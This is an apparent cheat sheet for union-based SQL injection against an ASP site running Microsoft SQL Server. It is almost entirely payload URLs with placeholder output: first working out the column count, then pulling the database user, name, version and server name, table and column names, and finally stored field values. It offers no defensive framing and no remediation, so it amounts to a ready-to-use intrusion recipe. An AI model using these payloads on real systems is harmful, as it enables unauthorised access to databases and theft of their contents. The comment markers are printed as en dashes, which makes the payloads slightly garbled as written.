UNION SQL INJECTION - DETECTION
Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1–
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2–
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3–
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4–
NO ERROR
UNION SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4–
[DB USER]
UNION SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4–
[DB NAME]
UNION SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4–
[DB VERSION]
UNION SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4–
[SERVER NAME]
UNION SQL INJECTION - EXTRACT DATABASE TABLES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)–
[TABLE NAME 1]
UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name=’TABLE-NAME-1′–
[COLUMN NAME 1]
UNION SQL INJECTION - EXTRACT 1st FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1–
[FIELD 1 VALUE]
UNION SQL INJECTION - EXTRACT 2nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1–
[FIELD 2 VALUE]
UNION SQL INJECTION - EXTRACT 3nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1–
[FIELD 3 VALUE]